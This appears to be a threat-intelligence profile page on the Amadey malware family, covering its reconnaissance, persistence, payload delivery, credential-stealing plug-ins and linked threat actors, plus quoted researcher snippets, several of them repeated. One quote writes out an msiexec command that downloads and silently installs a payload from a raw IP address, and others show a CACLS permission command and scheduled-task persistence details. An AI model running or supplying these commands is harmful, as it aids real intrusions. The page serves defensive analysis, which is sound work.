Amadey is a Windows malware family first observed in 2018 and commonly described as a bot, downloader, and information-stealing trojan used by multiple cybercriminal actors. It is designed to profile infected hosts, communicate with command-and-control infrastructure, and retrieve and execute additional payloads, making it a frequent initial-access and malware-delivery component in broader criminal intrusion chains. Amadey has been used to stage infostealers, proxy malware, cryptominers, and ransomware, and has appeared in campaigns linked to actors including TA505, Kimsuky, and TA406.
Core Amadey functionality includes host reconnaissance, collection of system and user information, command-and-control beaconing, and modular payload delivery. Reported samples gather details such as username, hostname, operating system version, architecture, privilege level, and installed security products. Amadey has also been observed checking for antivirus products and periodically communicating this profiling data to its operators. Technical reporting describes its command-and-control traffic as using RC4-encrypted binary data represented as hexadecimal strings in some versions.
Amadey supports persistence and follow-on execution through mechanisms including scheduled tasks and startup-related user shell folder modifications. It can download and launch both executable and DLL payloads, including plug-ins executed through native Windows utilities. Documented plug-ins and modules extend Amadey into credential theft and cryptocurrency theft use cases, including theft of browser and email-client data, Outlook profile information, MikroTik Winbox data, and wallet-related information. Some campaigns also used clipper functionality to hijack cryptocurrency transactions by replacing clipboard wallet addresses.
The malware has been distributed through several delivery channels, including phishing emails, malicious documents, fake cheats, cracked-software lures, exploit-based delivery, and other malware loaders such as SmokeLoader and PrivateLoader. It has been observed in opportunistic criminal ecosystems as well as targeted espionage-related operations. In some Kimsuky-linked activity, Amadey variants were adapted with AutoIt wrapping and domain-generation fallback behavior while preserving the family’s characteristic HTTP-based host-reporting and payload-download workflow.
Amadey remains notable for its longevity, broad reuse across threat actors, and role as a flexible malware service component rather than a single-purpose implant. Its operational value lies in combining lightweight reconnaissance, persistence, and modular payload delivery with optional stealing capabilities, allowing operators to use it as a scalable bridge between initial compromise and higher-value post-compromise objectives such as credential theft, proxy-bot deployment, or ransomware execution.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
We have also seen instances of Amaday C&C servers recently that are actively pushing DoublePulsar backdoor and EternalBlue exploit payloads on the victim machine. | One such threat we've kept an eye on is Amadey, a bot of Russian origin, which was first seen in late 2018. Once on a victim's machine, Amadey sends user data to a Command and Control (C&C) server and executes other tasks sent back by the C&C server.
8 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Un lien similaire a aussi été constaté par le CERT sud-coréen entre une souche du rançongiciel et une souche du code Amadey qui, bien que vendu sur certains forum d’attaquants, est aussi utilisé par TA505.
TA406 has used many different malware families, including KONNI, SANNY, CARROTBAT/CARROTBALL, BabyShark, Amadey and Android Moez.
The Amadey bot is a Trojan that was first discovered in 2018 and is used to steal sensitive information from the infected device.
During our analysis of the ROKRAT infection chain, we came across a similar chain leading to the deployment of Amadey, a commercial RAT sold in underground forums.
Il dépose entre 40 et 50 exécutables ... et installe simultanément plusieurs familles de malwares : Amadey (loader/bot)
Amadey and StealC are often used alongside each other: Amadey helps attackers gain access to devices, while StealC steals passwords and sensitive information.
34 distinct techniques documented for this family, organized by ATT&CK tactic.
With this, the malware executes every minute because it gets configured in the Task Scheduler.
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks... (T1053.005 – Scheduled Task/Job: Scheduled Task).
It gets the permission to read, write, and execute files using the command: /k echo Y|CACLS
Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently
With this, the malware executes every minute because it gets configured in the Task Scheduler.
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks... (T1053.005 – Scheduled Task/Job: Scheduled Task).
With this, the malware executes every minute because it gets configured in the Task Scheduler.
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks... (T1053.005 – Scheduled Task/Job: Scheduled Task).
This article will cover the the string encryption in Amadey 1.09, and will provide a step-by-step guide to create an automatic string decryption script in Java.
主な感染経路としてフィッシングメール、海賊版のソフトウェアへのバンドル、エクスプロイト経由で配布されることが報告されています。
pcVar1 = __Z12aGetSelfPathv ( ) ; __Z13aDropToSystemPc ( pcVar1 ) ; pcVar1 = __Z19aGetSelfDestinationi ( 0 ) ; __Z11aAutoRunSetPc ( pcVar1 ) ;
The goal of the script is to automatically decrypt the encrypted strings that are present within the binary.
The download URL is as follows: msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%'
Older versions of Mikrotiks Winbox would give the option to export you data to a ‘WBX’ file which would store the usernames and passwords for your managed devices unencrypted along with a Addresses.cdb file which is also stored unecrypted.
With this new version comes some interesting additions to the ‘cred’ stealer plugin as they have added functionality for harvesting Mikrotik router data and Outlook data
Cred64.dll is a 64-bit Microsoft Visual C/C++ DLL executable and is programmed to steal browser data
Another addition is the parsing of Outlook profiles from registry in order to harvest account data
The content repeatedly describes malware and threat actors collecting the username, identifying the current user, enumerating logged-on users, or running commands such as whoami, query user, and quser to determine user context on compromised systems.
Amadey is responsible for collecting information from infected machines, conducting C2 communications, and retrieving and executing additional payloads... As of 2026, the Amadey C2 communication that we have been able to confirm operates by encrypting binary data with an RC4 key, converting it into a hexadecimal string, and exchanging it in that form.
1,090 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A loader variant delivered by one sample in the same archive family. Unlike the Saked variants, it is configured for command-and-control, downloads further executables, and persists via scheduled task.
Malware family that can provide stolen credentials and initial access to ransomware operators.
A malware family used to supply initial access and stolen credentials to ransomware operators.
Malware named as a target of Operation Endgame law enforcement action.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.